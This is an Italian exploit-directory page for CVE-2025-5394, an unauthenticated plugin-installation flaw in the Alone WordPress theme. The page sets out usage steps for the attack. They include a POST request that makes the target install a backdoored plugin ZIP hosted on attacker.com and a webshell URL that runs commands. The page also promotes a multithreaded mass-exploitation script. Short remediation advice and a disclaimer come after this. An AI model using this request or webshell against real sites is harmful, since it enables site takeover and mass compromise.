Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-5394 — Alone – Tema WordPress Multiuso No-profit per Beneficenza <= 7.8.3 - Mancanza di autorizzazione che consente il caricamento arbitrario di file senza autenticazione tramite l'installazione di plugin | Kitploit
Strumenti/GitHubGitHub/yucaerin/cve-2025-5394
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubyucaerin/cve-2025-5394

CVE-2025-5394

Alone – Tema WordPress Multiuso No-profit per Beneficenza <= 7.8.3 - Mancanza di autorizzazione che consente il caricamento arbitrario di file senza autenticazione tramite l'installazione di plugin

Vedi Repository
131 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-5394 – Tema WordPress Alone <= 7.8.3 - Caricamento Arbitrario di File Non Autenticato tramite Installazione di Plugin

🔥 Riepilogo della Vulnerabilità
Il tema WordPress Alone nelle versioni <= 7.8.3 è vulnerabile a un caricamento arbitrario di file non autenticato. Questa falla consente a attaccanti non autenticati di caricare e installare file ZIP di plugin arbitrari da URL remoti tramite un endpoint AJAX non protetto — con conseguente esecuzione remota di codice (RCE) tramite la distribuzione di plugin con backdoor.

Questa vulnerabilità deriva dalla funzione beplus_import_pack_install_plugin esposta al pubblico tramite wp_ajax_nopriv_ senza alcun controllo di autenticazione o delle capability. La funzione installa e attiva un plugin da un URL fornito dall'utente.

🔍 Tema Interessato

  • Nome del Tema: Alone – Tema WordPress Non-profit Multiuso per Beneficenza
  • Versione Interessata: <= 7.8.3
  • Tipo di Vulnerabilità: Caricamento Arbitrario di File Non Autenticato → RCE
  • CVE ID: CVE-2025-5394
  • Punteggio CVSS: 9.8 (Critico)
  • Impatto: Esecuzione remota di codice (RCE) totale e compromissione completa del sito

🧪 Caratteristiche dell'Exploit

  • 🔓 Nessuna autenticazione richiesta
  • 📦 Carica ZIP di plugin dannosi direttamente da URL remoto
  • 🚀 Installa e attiva automaticamente il plugin
  • 🐚 Consegna di webshell supportata tramite PHP incorporato nel plugin
  • ✅ Endpoint AJAX accessibile agli utenti non autenticati: /wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin

🧠 Ricercatore

  • Crediti: Thai An

🚀 Utilizzo

  1. Prepara un file ZIP di plugin dannoso ospitato su un server che controlli.

    • Deve contenere un'intestazione di plugin valida (Plugin Name:) e un backdoor PHP (es., bk.php)
  2. Costruisci la seguente richiesta POST:

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: victim.com
    Content-Type: application/x-www-form-urlencoded
    
    action=beplus_import_pack_install_plugin&
    data[plugin_slug]=hello-dolly&
    data[plugin_source]=https://attacker.com/hello-dolly.zip
    
  3. In caso di successo, il plugin viene installato e attivato. Accedi alla tua shell all'indirizzo:

    root@kitploit:~
    https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
    

🧰 Script di Sfruttamento di Massa Questo repository include uno strumento di sfruttamento di massa con:

  • Elaborazione multi-thread
  • Aggiunta automatica del prefisso HTTPS (se mancante)
  • Registrazione in tempo reale dei target riusciti in result.txt

Vedi mass_beplus_exploit.py per i dettagli.

🛠 Raccomandazioni di Correzione

  • Gli autori del tema dovrebbero rimuovere o proteggere l'hook wp_ajax_nopriv_beplus_import_pack_install_plugin.
  • Implementare controlli di autenticazione/capability (es., current_user_can('install_plugins'))
  • Validare e limitare le sorgenti dei plugin.
  • Utilizzare un Web Application Firewall (WAF) per bloccare l'accesso non autorizzato ad admin-ajax.

🔒 Disclaimer:
Queste informazioni sono fornite esclusivamente a scopo educativo e per test di sicurezza autorizzati. L'accesso o l'uso non autorizzato di sistemi informatici è illegale e contrario all'etica.

📚 Riferimento:

  • Avviso Wordfence – CVE-2025-5394

CVE: CVE-2025-5394
Ricercatore: Thai An

Scarica lo strumento